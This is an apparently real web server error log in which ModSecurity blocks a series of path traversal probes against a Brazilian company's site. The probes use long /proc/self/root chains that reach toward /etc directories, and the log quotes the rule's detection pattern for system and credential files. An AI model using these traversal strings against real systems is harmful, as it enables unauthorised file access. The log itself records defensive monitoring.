[Mon Mar 16 16:28:55.954955 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.241.46:60434] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ90r9dMAiw-8KANNYbgAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:59.370807 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.241.46:60440] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ-46lpbStxTqkSkt84QAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:00.696905 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.241.46:47212] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ_LysWC90G-1nBrBVvwAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:02.970434 2026] [:error] [pid 14895:tid 140411699963648] [client 74.7.241.46:47222] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ_lajLEzk2WiQ-10kXgAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:05.367980 2026] [:error] [pid 29507:tid 140411632822016] [client 74.7.241.46:47232] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaAUr9dMAiw-8KANNYcQAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:07.687131 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:47242] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaAv9ocpUE4ed4uDwD7gAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:09.090326 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.241.46:57376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaBaTCbgAP5jq5Teg94gAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:10.303715 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.241.46:57380] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaBo6lpbStxTqkSkt84gAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:18.378601 2026] [:error] [pid 29507:tid 140411733534464] [client 74.7.241.46:57390] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaDkr9dMAiw-8KANNYfAAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:19.810465 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:60014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaD_9ocpUE4ed4uDwEAgAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:21.019155 2026] [:error] [pid 29802:tid 140411632822016] [client 74.7.241.46:60018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaEc_BxrYCr4hPDw_8gwAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:22.365538 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.241.46:60030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaEv9ocpUE4ed4uDwEBgAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:23.548335 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.241.46:60044] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaE6TCbgAP5jq5Teg94wAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:26.968055 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:60058] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaFv9ocpUE4ed4uDwEDgAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:29.367459 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.241.46:45748] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaGf9ocpUE4ed4uDwEEwAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:35.130423 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:45756] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaHf9ocpUE4ed4uDwEGwAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:40.172135 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:45772] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaJKTCbgAP5jq5Teg95wAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:41.512422 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:51492] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaJbysWC90G-1nBrBVwwAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:41.735845 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.244.31:56642] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhaJY6lpbStxTqkSkt85QAAAkE"]
[Mon Mar 16 16:29:43.505158 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.241.46:51502] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaJtSswJuvopo3lOhwyAAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:45.964347 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.241.46:51510] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaKdSswJuvopo3lOhwzQAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:29:47.903372 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.241.46:51520] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaK1ajLEzk2WiQ-10kZAAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
